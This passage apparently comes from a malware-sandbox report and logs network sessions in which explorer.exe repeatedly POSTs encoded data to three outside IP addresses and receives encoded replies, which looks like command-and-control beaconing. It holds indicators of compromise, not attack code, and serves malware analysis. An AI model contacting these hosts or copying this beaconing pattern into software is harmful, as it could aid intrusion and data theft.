2024-07-27 05:31:10 UTC	685	IN	Data Raw: 52 66 78 2f 70 46 70 35 6d 72 39 56 39 5a 66 4c 65 72 4c 44 54 4b 77 64 50 47 59 64 73 78 70 34 79 47 2f 67 63 45 61 34 7a 56 62 36 63 2b 6a 57 6f 50 65 65 74 54 45 4c 79 6e 75 37 4b 6f 37 32 2f 50 49 74 61 46 46 37 56 52 44 7a 50 35 4e 79 71 4e 34 65 2f 4d 44 64 63 39 4f 66 76 4c 32 4e 52 58 51 38 4c 45 5a 6b 74 63 72 4b 62 63 74 77 52 78 4d 31 52 4d 4b 65 79 6d 43 33 44 4a 36 38 45 54 4b 59 72 76 7a 4f 69 73 44 67 52 74 55 2f 73 57 72 62 6b 2b 32 50 43 56 6f 31 4f 78 67 6f 4f 4a 55 52 32 51 4f 56 50 34 43 6c 50 6e 4b 74 38 6f 59 77 70 71 75 37 57 6b 43 4a 69 49 4b 55 57 4b 4c 79 58 67 35 4b 34 38 37 7a 54 45 67 56 4f 36 7a 4a 39 59 4c 79 55 73 76 65 65 58 74 2b 2b 4c 51 79 53 4d 71 37 77 44 4f 74 61 76 6f 5a 4a 4a 35 55 73 4b 34 41 64 62 6a 39 39 5a 78 Data Ascii: Rfx/pFp5mr9V9ZfLerLDTKwdPGYdsxp4yG/gcEa4zVb6c+jWoPeetTELynu7Ko72/PItaFF7VRDzP5NyqN4e/MDdc9OfvL2NRXQ8LEZktcrKbctwRxM1RMKeymC3DJ68ETKYrvzOisDgRtU/sWrbk+2PCVo1OxgoOJUR2QOVP4ClPnKt8oYwpqu7WkCJiIKUWKLyXg5K487zTEgVO6zJ9YLyUsveeXt++LQySMq7wDOtavoZJJ5UsK4Adbj99Zx

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.5	51864	107.173.160.137	443	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:31:11 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1267
2024-07-27 05:31:11 UTC	1267	OUT	Data Raw: 4a 6a 68 5a 4b 77 4b 7a 68 51 37 32 42 66 51 38 65 73 46 59 65 4e 72 36 4c 54 35 43 4d 6c 68 78 72 6f 38 72 79 74 4a 38 79 59 6b 56 68 54 69 73 57 53 69 57 7a 4f 33 38 39 70 50 7a 53 71 78 47 4f 76 6c 44 32 41 47 73 71 63 79 50 47 49 71 4f 35 65 53 44 48 63 41 73 4b 43 56 65 30 6b 71 72 33 42 71 32 44 68 49 34 7a 31 35 58 4a 6b 49 2b 4f 57 6a 71 56 45 7a 6f 52 48 74 45 38 6d 5a 4a 38 68 72 5a 61 79 6c 30 56 6c 38 4a 6c 30 70 6b 71 6a 34 36 70 64 66 52 78 69 4a 35 78 58 71 58 58 39 43 6f 71 38 5a 77 59 51 65 48 6d 7a 53 75 46 48 39 73 6e 4c 45 71 66 4e 6a 6a 64 37 6c 52 34 4d 4b 54 34 33 43 61 71 51 56 36 4c 48 6a 62 44 71 38 6e 37 67 53 34 37 68 30 31 4d 73 2b 45 65 76 31 30 31 68 4f 4f 4d 68 56 6e 61 5a 69 2f 48 51 78 63 6d 6a 7a 62 6b 76 73 39 4a 76 33 Data Ascii: JjhZKwKzhQ72BfQ8esFYeNr6LT5CMlhxro8rytJ8yYkVhTisWSiWzO389pPzSqxGOvlD2AGsqcyPGIqO5eSDHcAsKCVe0kqr3Bq2DhI4z15XJkI+OWjqVEzoRHtE8mZJ8hrZayl0Vl8Jl0pkqj46pdfRxiJ5xXqXX9Coq8ZwYQeHmzSuFH9snLEqfNjjd7lR4MKT43CaqQV6LHjbDq8n7gS47h01Ms+Eev101hOOMhVnaZi/HQxcmjzbkvs9Jv3
2024-07-27 05:31:12 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:31:12 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:31:12 UTC	685	IN	Data Raw: 6f 73 4c 6e 33 62 49 73 50 76 6e 38 78 77 55 47 67 75 62 61 55 34 6a 6c 41 41 7a 52 72 79 32 50 65 68 4a 64 78 66 52 35 75 36 45 37 4d 77 73 7a 7a 68 43 6f 6c 36 5a 31 36 58 55 78 77 4b 46 54 78 6f 41 57 35 6d 6c 79 48 6e 32 5a 55 6c 61 30 47 42 64 68 36 64 77 53 57 62 4d 6a 4a 66 34 38 79 73 56 79 52 72 42 4e 79 57 61 67 73 4c 6f 68 62 36 38 46 77 49 4f 78 45 48 59 61 37 4d 4e 62 58 50 63 41 35 36 58 64 64 54 43 2b 51 79 76 49 32 54 2b 52 64 38 30 43 53 5a 52 45 35 46 51 67 47 30 38 62 33 6f 59 6e 37 31 62 45 6c 65 53 74 55 64 78 74 6d 73 4c 6b 68 49 7a 6c 7a 53 75 6e 35 5a 6a 39 58 61 67 6c 66 47 48 45 36 7a 68 57 2f 41 65 4e 51 6b 69 30 37 74 46 4d 44 4f 68 36 6a 2f 35 62 69 59 59 53 59 6a 37 50 4b 41 77 52 31 32 4b 66 46 30 57 49 4d 47 61 74 32 57 63 Data Ascii: osLn3bIsPvn8xwUGgubaU4jlAAzRry2PehJdxfR5u6E7MwszzhCol6Z16XUxwKFTxoAW5mlyHn2ZUla0GBdh6dwSWbMjJf48ysVyRrBNyWagsLohb68FwIOxEHYa7MNbXPcA56XddTC+QyvI2T+Rd80CSZRE5FQgG08b3oYn71bEleStUdxtmsLkhIzlzSun5Zj9XaglfGHE6zhW/AeNQki07tFMDOh6j/5biYYSYj7PKAwR12KfF0WIMGat2Wc

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.5	51865	107.173.160.139	443	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:31:13 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 05:31:13 UTC	1122	OUT	Data Raw: 4e 61 6e 4b 39 72 31 42 77 35 6d 77 42 58 75 62 62 33 2f 42 31 56 68 57 47 35 4b 69 4d 77 35 69 4c 67 47 75 39 36 42 6e 4b 6f 58 66 64 4c 6e 51 72 79 79 4e 48 61 6e 4f 63 5a 5a 38 75 38 2b 67 71 47 44 42 72 32 38 4c 7a 43 69 74 4b 43 41 6a 62 61 6f 36 37 65 57 39 47 47 59 48 4f 6f 62 6b 31 43 74 59 58 32 41 6e 41 6f 64 6a 76 6f 2b 73 46 42 75 72 33 50 38 33 47 63 6d 78 35 76 5a 6f 5a 30 79 56 6d 4e 6b 55 70 4f 32 70 6a 4d 5a 77 5a 6d 44 4f 45 42 65 4f 73 48 42 38 49 6b 57 4c 5a 61 64 41 37 44 67 35 72 36 79 56 31 42 49 35 4a 56 34 63 34 48 68 56 77 32 78 58 45 36 6f 32 47 4a 39 73 79 78 2f 6d 4b 31 30 6f 74 47 50 70 33 59 4e 76 49 66 38 79 75 30 45 73 78 4f 6b 2b 72 48 4c 6b 45 4f 47 61 70 53 51 63 76 47 53 51 6a 57 75 70 44 50 41 38 39 70 63 68 54 2f 75 Data Ascii: NanK9r1Bw5mwBXubb3/B1VhWG5KiMw5iLgGu96BnKoXfdLnQryyNHanOcZZ8u8+gqGDBr28LzCitKCAjbao67eW9GGYHOobk1CtYX2AnAodjvo+sFBur3P83Gcmx5vZoZ0yVmNkUpO2pjMZwZmDOEBeOsHB8IkWLZadA7Dg5r6yV1BI5JV4c4HhVw2xXE6o2GJ9syx/mK10otGPp3YNvIf8yu0EsxOk+rHLkEOGapSQcvGSQjWupDPA89pchT/u
2024-07-27 05:31:14 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:31:14 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:31:14 UTC	685	IN	Data Raw: 42 54 62 32 71 55 70 6f 4c 47 73 52 6e 71 78 4f 4d 78 73 4a 67 76 78 43 50 6e 6a 6b 61 32 6f 70 48 33 31 4f 58 37 47 34 34 53 30 78 72 30 4b 43 4e 6b 64 45 6e 72 71 37 78 4b 41 35 6c 69 2b 34 77 43 75 32 52 4b 6f 56 71 39 6c 75 55 75 77 75 5a 69 36 63 4a 6a 46 76 65 4a 38 65 43 66 6f 45 71 38 37 31 64 35 4d 39 79 69 71 6e 4f 6f 6b 46 57 55 53 32 32 46 69 73 33 4d 32 6a 74 67 42 54 2b 2f 6f 51 52 56 56 4e 63 36 39 7a 4f 37 6c 4b 77 62 6d 6d 72 54 69 70 6a 79 57 77 37 61 76 4d 4b 34 31 35 41 4a 4c 50 4d 6e 71 61 77 31 70 72 4c 37 37 38 53 55 6d 2b 34 4d 6f 66 38 6e 56 66 46 79 46 30 2f 4a 6a 6a 62 32 53 66 44 64 58 69 56 33 56 74 73 79 37 76 6e 43 41 6c 53 6e 35 67 71 32 31 67 45 48 64 59 5a 52 66 45 30 76 39 52 58 6e 32 6b 4e 79 50 61 4c 33 72 4d 6a 67 37 Data Ascii: BTb2qUpoLGsRnqxOMxsJgvxCPnjka2opH31OX7G44S0xr0KCNkdEnrq7xKA5li+4wCu2RKoVq9luUuwuZi6cJjFveJ8eCfoEq871d5M9yiqnOokFWUS22Fis3M2jtgBT+/oQRVVNc69zO7lKwbmmrTipjyWw7avMK415AJLPMnqaw1prL778SUm+4Mof8nVfFyF0/Jjjb2SfDdXiV3Vtsy7vnCAlSn5gq21gEHdYZRfE0v9RXn2kNyPaL3rMjg7

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.5	51866	167.235.128.153	443	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:31:15 UTC	234	OUT	POST / HTTP/1.1 Host: 167.235.128.153 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1267
2024-07-27 05:31:15 UTC	1267	OUT	Data Raw: 43 42 34 71 57 7a 6b 72 36 57 7a 61 4b 4d 49 46 66 64 64 77 36 58 48 61 6e 44 62 67 57 32 63 50 50 2f 4e 47 44 64 53 57 61 43 30 73 71 6b 6e 51 71 65 62 36 4e 6a 4c 38 52 6a 78 4a 6c 2b 45 55 67 50 41 50 53 61 4c 73 61 30 2b 67 55 70 71 6c 74 34 44 56 77 35 51 66 78 4c 38 62 38 6f 79 74 54 63 61 77 6f 73 31 4e 56 6c 64 59 50 35 59 45 66 73 2f 4e 33 77 61 78 36 66 55 61 45 56 68 7a 68 32 45 58 47 76 62 38 57 68 30 6a 6a 45 6b 63 45 31 2f 75 43 58 68 72 45 62 4c 56 4a 4f 2b 4d 6e 4c 33 41 30 2b 53 77 54 69 6c 37 6c 2b 57 72 6d 34 58 49 41 55 76 4e 44 4b 78 73 4f 33 77 66 37 36 73 77 53 55 45 50 6d 30 6f 75 4c 6b 59 43 63 49 35 34 56 63 70 31 59 5a 30 6f 57 6d 74 6d 65 4c 75 38 30 47 37 43 6a 42 75 52 48 55 78 48 61 75 64 58 2b 41 6c 64 42 6f 77 51 6c 77 56 Data Ascii: CB4qWzkr6WzaKMIFfddw6XHanDbgW2cPP/NGDdSWaC0sqknQqeb6NjL8RjxJl+EUgPAPSaLsa0+gUpqlt4DVw5QfxL8b8oytTcawos1NVldYP5YEfs/N3wax6fUaEVhzh2EXGvb8Wh0jjEkcE1/uCXhrEbLVJO+MnL3A0+SwTil7l+Wrm4XIAUvNDKxsO3wf76swSUEPm0ouLkYCcI54Vcp1YZ0oWmtmeLu80G7CjBuRHUxHaudX+AldBowQlwV
2024-07-27 05:31:16 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:31:16 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:31:16 UTC	685	IN	Data Raw: 42 6a 53 75 31 78 63 34 5a 77 63 51 78 4a 72 41 6f 76 66 62 42 50 63 2b 52 2b 2f 47 4f 43 6d 45 31 33 42 4f 6f 59 36 78 49 44 4b 4a 4d 53 37 56 42 72 54 4c 30 2f 4d 79 50 70 6b 4f 2b 42 37 75 46 6c 7a 67 78 34 56 53 4e 6f 76 42 36 78 48 30 48 4d 49 35 39 6e 74 41 52 4d 72 77 4c 70 77 74 77 33 4b 54 66 5a 52 42 62 69 4a 76 77 6a 4d 64 55 54 38 71 42 31 70 35 67 49 51 5a 4b 4b 71 65 43 74 62 44 59 34 39 4f 55 4c 79 6d 64 68 4c 6b 6d 4d 54 66 75 2b 66 38 72 64 2f 4f 2f 35 30 44 74 64 4b 39 75 71 65 52 63 4f 31 4e 39 72 31 37 56 54 70 4d 54 52 50 35 39 47 4b 50 34 30 34 42 70 6e 4e 48 62 4c 6e 32 53 55 70 69 48 38 44 66 2b 62 47 73 69 6b 78 35 30 62 39 62 41 54 65 50 45 68 76 31 47 63 66 35 31 57 34 6f 49 74 54 50 4b 2f 4c 72 51 66 36 62 38 57 6b 65 32 53 73 Data Ascii: BjSu1xc4ZwcQxJrAovfbBPc+R+/GOCmE13BOoY6xIDKJMS7VBrTL0/MyPpkO+B7uFlzgx4VSNovB6xH0HMI59ntARMrwLpwtw3KTfZRBbiJvwjMdUT8qB1p5gIQZKKqeCtbDY49OULymdhLkmMTfu+f8rd/O/50DtdK9uqeRcO1N9r17VTpMTRP59GKP404BpnNHbLn2SUpiH8Df+bGsikx50b9bATePEhv1Gcf51W4oItTPK/LrQf6b8Wke2Ss

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.5	51867	107.173.160.137	443	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:31:17 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 05:31:17 UTC	1122	OUT	Data Raw: 50 42 65 44 68 75 45 34 34 42 63 77 32 66 6c 76 77 42 7a 65 42 62 68 37 49 35 50 48 2f 67 6f 4a 56 4e 57 42 33 48 53 71 41 43 59 79 71 6b 79 45 49 46 2f 2f 37 44 4c 51 49 74 55 63 42 36 32 37 68 73 54 79 55 2f 2f 55 77 39 49 5a 77 43 53 63 39 5a 56 6a 4f 2f 37 4d 50 49 58 63 36 75 51 50 6c 56 68 62 4b 51 31 34 66 53 76 7a 75 6b 79 56 36 6b 54 42 72 4e 43 39 77 63 4b 70 32 70 4b 79 57 41 62 72 79 72 6a 71 6d 66 35 55 42 77 54 7a 39 47 61 71 2f 50 64 77 67 67 35 6a 61 36 65 4c 33 41 33 51 31 4e 38 5a 6b 32 6d 41 4c 67 54 35 38 75 74 44 45 38 79 4b 35 77 38 56 36 44 6b 72 42 58 4c 4e 56 63 53 2f 6e 6b 5a 4f 57 4d 41 77 36 52 2f 32 75 4f 4d 66 7a 63 66 4a 42 32 5a 31 79 36 70 54 76 42 39 49 37 66 42 46 73 66 43 44 36 64 34 77 78 78 65 4d 2f 39 73 5a 57 35 43 Data Ascii: PBeDhuE44Bcw2flvwBzeBbh7I5PH/goJVNWB3HSqACYyqkyEIF//7DLQItUcB627hsTyU//Uw9IZwCSc9ZVjO/7MPIXc6uQPlVhbKQ14fSvzukyV6kTBrNC9wcKp2pKyWAbryrjqmf5UBwTz9Gaq/Pdwgg5ja6eL3A3Q1N8Zk2mALgT58utDE8yK5w8V6DkrBXLNVcS/nkZOWMAw6R/2uOMfzcfJB2Z1y6pTvB9I7fBFsfCD6d4wxxeM/9sZW5C
2024-07-27 05:31:18 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:31:18 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:31:18 UTC	685	IN	Data Raw: 6d 52 4a 4f 50 52 6f 4a 50 71 38 30 58 63 50 64 75 4a 49 4d 5a 63 6b 67 56 63 2b 2f 6e 64 71 58 79 4e 47 50 58 4d 6a 75 33 4f 42 37 72 58 6a 78 43 63 78 70 53 52 73 78 34 64 78 6b 52 76 4a 6f 6b 51 64 74 63 5a 39 4d 52 53 44 4e 31 50 39 57 6c 2b 76 66 61 43 6c 30 77 67 62 50 68 51 6e 71 43 56 4d 67 61 68 37 39 39 72 6b 37 33 58 41 31 4f 78 43 49 65 5a 38 6e 49 66 2b 38 42 70 6a 74 79 32 30 6e 63 74 4a 31 6f 44 42 56 42 56 73 34 73 48 36 53 57 6b 4f 76 63 58 65 38 48 41 72 46 66 54 54 76 72 46 71 55 68 52 65 6a 39 63 62 47 58 74 59 50 48 52 2f 72 44 55 5a 42 44 55 4b 63 61 42 69 36 65 6b 33 36 67 51 70 56 47 52 4c 75 64 32 4f 71 63 6f 2b 70 37 78 4c 53 56 33 4b 68 47 31 63 50 73 67 44 55 78 70 42 78 63 76 64 66 76 69 38 43 37 6c 75 4e 45 52 6e 75 46 72 76 Data Ascii: mRJOPRoJPq80XcPduJIMZckgVc+/ndqXyNGPXMju3OB7rXjxCcxpSRsx4dxkRvJokQdtcZ9MRSDN1P9Wl+vfaCl0wgbPhQnqCVMgah799rk73XA1OxCIeZ8nIf+8Bpjty20nctJ1oDBVBVs4sH6SWkOvcXe8HArFfTTvrFqUhRej9cbGXtYPHR/rDUZBDUKcaBi6ek36gQpVGRLud2Oqco+p7xLSV3KhG1cPsgDUxpBxcvdfvi8C7luNERnuFrv

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.5	51868	107.173.160.139	443	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:31:19 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1267
2024-07-27 05:31:19 UTC	1267	OUT	Data Raw: 4f 38 58 4b 69 37 56 46 61 75 64 56 6e 43 49 31 74 2b 79 56 6c 69 73 42 35 4c 39 38 35 61 7a 55 41 4f 78 54 6c 57 44 75 4b 55 72 6f 71 77 6d 61 43 38 5a 54 51 51 4b 39 44 4c 53 43 43 52 67 35 74 54 6d 47 77 45 6f 4e 37 61 74 49 68 6c 6a 57 46 41 74 77 31 44 35 4a 41 57 4d 4c 72 36 4c 4b 55 57 78 42 57 42 74 79 77 6e 37 35 48 6e 33 4e 37 46 71 2f 5a 49 68 72 6e 39 7a 75 43 6d 77 36 75 37 4f 66 7a 7a 53 67 4e 56 75 79 4e 4d 4f 44 35 75 54 48 64 36 31 6c 7a 69 4e 4e 36 47 46 2f 31 71 31 37 63 52 45 47 59 36 5a 67 75 6f 45 63 56 48 32 56 33 31 70 35 71 52 54 37 6c 70 49 4d 4a 55 36 70 31 57 56 52 7a 72 65 6a 36 79 30 66 50 51 62 78 78 38 67 33 4e 52 55 72 57 32 35 33 77 64 46 42 39 73 52 64 5a 45 76 6f 59 52 6d 42 4f 74 6e 49 73 61 67 37 79 70 50 79 62 53 4f Data Ascii: O8XKi7VFaudVnCI1t+yVlisB5L985azUAOxTlWDuKUroqwmaC8ZTQQK9DLSCCRg5tTmGwEoN7atIhljWFAtw1D5JAWMLr6LKUWxBWBtywn75Hn3N7Fq/ZIhrn9zuCmw6u7OfzzSgNVuyNMOD5uTHd61lziNN6GF/1q17cREGY6ZguoEcVH2V31p5qRT7lpIMJU6p1WVRzrej6y0fPQbxx8g3NRUrW253wdFB9sRdZEvoYRmBOtnIsag7ypPybSO
2024-07-27 05:31:20 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:31:20 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:31:20 UTC	685	IN	Data Raw: 4a 53 65 63 74 37 6a 72 39 33 62 72 50 41 63 33 45 76 67 6e 67 6d 37 63 78 63 76 72 42 61 43 61 41 38 74 5a 46 34 62 76 33 57 67 58 57 2b 44 6c 52 38 6a 4b 4d 6e 77 4f 6b 67 6e 42 75 52 46 35 53 78 66 47 64 50 42 75 4d 59 38 4b 37 52 69 31 49 4c 52 58 4d 53 79 6c 70 76 73 50 54 55 7a 46 31 70 41 70 5a 31 6a 52 55 4e 32 49 53 36 4b 64 35 46 47 68 56 4f 76 41 68 4f 45 46 74 6c 34 4c 35 57 6e 63 36 6d 6a 63 52 48 50 30 75 69 33 52 75 45 6b 59 32 59 79 61 59 34 53 45 67 4d 72 5a 75 72 55 54 51 33 30 74 2b 67 61 59 71 75 6a 59 48 45 4e 78 31 73 58 32 4d 68 41 39 54 4b 65 61 4b 36 58 63 48 7a 74 66 6f 41 56 4f 76 4f 52 75 41 62 41 4e 42 32 59 50 55 39 31 63 42 6f 37 6a 59 76 70 4d 37 54 39 54 41 2b 76 70 46 55 6e 39 5a 35 78 4e 39 6d 70 71 65 34 2b 6c 64 72 68 Data Ascii: JSect7jr93brPAc3Evgngm7cxcvrBaCaA8tZF4bv3WgXW+DlR8jKMnwOkgnBuRF5SxfGdPBuMY8K7Ri1ILRXMSylpvsPTUzF1pApZ1jRUN2IS6Kd5FGhVOvAhOEFtl4L5Wnc6mjcRHP0ui3RuEkY2YyaY4SEgMrZurUTQ30t+gaYqujYHENx1sX2MhA9TKeaK6XcHztfoAVOvORuAbANB2YPU91cBo7jYvpM7T9TA+vpFUn9Z5xN9mpqe4+ldrh

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.5	51869	167.235.128.153	443	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:31:21 UTC	234	OUT	POST / HTTP/1.1 Host: 167.235.128.153 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 05:31:21 UTC	1122	OUT	Data Raw: 63 6b 37 51 43 48 75 79 49 6f 76 78 39 39 42 72 42 34 33 44 4d 2f 2b 42 43 57 48 2b 58 54 57 50 78 48 32 66 69 79 2f 57 46 70 68 41 4c 65 63 56 52 6c 4c 4e 67 56 63 51 56 71 2b 67 4c 79 2b 78 4e 79 78 77 6e 6a 55 69 44 7a 33 75 52 67 48 4f 75 58 49 45 53 77 43 34 52 77 4d 56 49 54 55 57 51 38 50 41 6b 47 49 65 6c 67 4d 6f 51 4b 66 36 4a 2b 54 79 2b 58 69 34 63 57 56 58 4f 61 44 57 66 30 77 75 59 42 4d 77 73 35 4c 54 74 33 50 56 65 54 2b 4f 58 58 34 47 31 70 56 47 79 4b 78 33 72 68 5a 65 34 34 7a 4a 32 2f 4a 43 4d 4e 2b 64 56 30 77 50 32 6d 5a 56 30 50 69 4b 71 6d 42 35 51 4f 69 79 72 69 51 66 68 41 30 57 76 72 43 51 72 62 53 42 74 58 49 4a 5a 71 78 78 77 5a 65 46 41 4d 4c 33 56 33 6d 43 58 4b 37 53 47 7a 62 49 38 56 4f 2b 53 43 4e 31 50 33 41 37 73 36 37 Data Ascii: ck7QCHuyIovx99BrB43DM/+BCWH+XTWPxH2fiy/WFphALecVRlLNgVcQVq+gLy+xNyxwnjUiDz3uRgHOuXIESwC4RwMVITUWQ8PAkGIelgMoQKf6J+Ty+Xi4cWVXOaDWf0wuYBMws5LTt3PVeT+OXX4G1pVGyKx3rhZe44zJ2/JCMN+dV0wP2mZV0PiKqmB5QOiyriQfhA0WvrCQrbSBtXIJZqxxwZeFAML3V3mCXK7SGzbI8VO+SCN1P3A7s67
2024-07-27 05:31:22 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:31:22 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:31:22 UTC	685	IN	Data Raw: 41 46 7a 31 67 41 71 4b 32 2f 63 65 56 52 74 6a 34 49 74 54 57 48 51 4c 39 63 53 4b 6f 30 74 6b 6b 58 62 4c 41 56 43 45 37 48 53 71 4a 52 64 68 33 36 65 72 6c 67 32 44 52 43 44 78 4d 36 59 74 79 53 5a 33 5a 50 61 4c 38 6f 39 51 30 34 61 70 61 79 71 79 4b 6a 30 2b 70 32 70 32 6b 34 49 6e 68 78 37 39 55 5a 70 68 2f 62 50 7a 6e 44 62 56 62 2f 55 4d 6e 4a 77 75 65 30 30 41 74 78 30 52 4d 54 6e 7a 4d 63 55 35 44 44 6c 31 4b 68 47 68 55 36 32 54 4b 4a 4a 78 42 62 57 62 4d 71 46 56 43 74 57 64 37 48 39 39 6e 4a 46 43 4e 41 36 62 72 78 6d 4b 5a 55 6a 6b 49 63 59 76 35 55 61 50 63 2b 37 44 72 41 6f 59 30 34 59 39 32 43 47 41 5a 6d 6d 70 4f 33 4f 65 41 6f 64 34 41 69 61 42 42 4e 4c 42 44 31 74 61 6c 51 72 4d 49 57 68 35 42 74 4e 6c 65 36 44 36 70 4f 56 79 44 4a 42 Data Ascii: AFz1gAqK2/ceVRtj4ItTWHQL9cSKo0tkkXbLAVCE7HSqJRdh36erlg2DRCDxM6YtySZ3ZPaL8o9Q04apayqyKj0+p2p2k4Inhx79UZph/bPznDbVb/UMnJwue00Atx0RMTnzMcU5DDl1KhGhU62TKJJxBbWbMqFVCtWd7H99nJFCNA6brxmKZUjkIcYv5UaPc+7DrAoY04Y92CGAZmmpO3OeAod4AiaBBNLBD1talQrMIWh5BtNle6D6pOVyDJB

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.5	51870	107.173.160.137	443	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:31:23 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 05:31:23 UTC	1122	OUT	Data Raw: 6f 47 78 67 53 79 76 4a 6f 4a 6a 34 70 48 6e 33 43 6e 51 32 32 52 36 65 41 73 39 35 73 69 4f 39 35 5a 43 59 6b 32 7a 59 79 68 55 44 46 34 62 54 47 6e 42 6d 4b 61 6d 32 58 34 4f 6c 50 36 74 74 52 59 41 79 44 72 54 76 4a 2f 70 4c 59 6d 6a 36 78 71 2b 6d 34 58 56 4d 2b 70 38 64 79 5a 70 54 37 33 6f 42 4f 74 37 47 69 4e 44 57 7a 6f 4e 6e 62 4c 4a 6c 72 54 70 6b 4f 59 39 4e 42 2f 66 31 64 6d 48 69 61 39 79 76 2b 32 6a 66 46 6d 50 6a 42 7a 4d 75 39 79 75 67 49 51 71 4d 6f 41 72 5a 6f 42 6f 67 33 50 4d 52 4e 46 76 6b 70 53 2b 4a 4c 73 34 47 2b 4a 63 77 34 66 70 35 2f 59 50 32 37 31 56 71 56 42 6c 54 51 32 4d 79 77 57 6d 59 38 61 6a 78 43 45 6a 6a 4b 69 36 57 53 69 72 78 43 44 70 68 69 31 76 47 69 63 31 57 34 6d 70 30 2f 55 4d 4f 76 35 38 66 68 7a 6a 67 2f 52 68 Data Ascii: oGxgSyvJoJj4pHn3CnQ22R6eAs95siO95ZCYk2zYyhUDF4bTGnBmKam2X4OlP6ttRYAyDrTvJ/pLYmj6xq+m4XVM+p8dyZpT73oBOt7GiNDWzoNnbLJlrTpkOY9NB/f1dmHia9yv+2jfFmPjBzMu9yugIQqMoArZoBog3PMRNFvkpS+JLs4G+Jcw4fp5/YP271VqVBlTQ2MywWmY8ajxCEjjKi6WSirxCDphi1vGic1W4mp0/UMOv58fhzjg/Rh
2024-07-27 05:31:24 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:31:24 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:31:24 UTC	685	IN	Data Raw: 5a 44 37 55 4b 48 67 70 43 54 4f 33 72 32 30 70 68 30 6a 54 6c 4e 59 38 58 75 47 51 4b 59 39 6c 4d 50 58 7a 6a 52 71 36 6c 42 61 64 62 6c 2f 52 47 56 2f 69 65 66 47 5a 4b 2b 50 32 4d 43 32 45 6e 5a 44 68 6a 42 58 6d 6a 63 70 64 79 33 53 65 4e 44 66 6f 65 76 33 68 36 53 6a 39 31 32 32 69 37 55 77 56 71 58 73 77 49 51 75 45 5a 39 73 32 61 77 38 61 5a 49 38 4d 31 45 52 52 75 35 52 64 37 39 4b 57 4f 4a 6b 57 69 72 49 2b 41 51 75 4f 5a 4e 61 67 51 2b 53 6f 41 43 47 4e 67 58 71 71 72 30 72 42 79 43 37 46 37 58 2b 49 4d 43 6d 31 71 78 4b 5a 70 58 36 59 53 34 44 55 76 6c 7a 70 30 44 73 6d 45 58 61 58 56 72 4b 39 61 7a 42 68 64 51 42 61 6c 47 34 71 69 4a 43 76 52 6d 71 63 4e 54 7a 72 53 74 42 35 77 39 58 32 77 72 65 78 6a 4b 71 41 4c 64 71 4f 58 57 64 6b 71 37 4b Data Ascii: 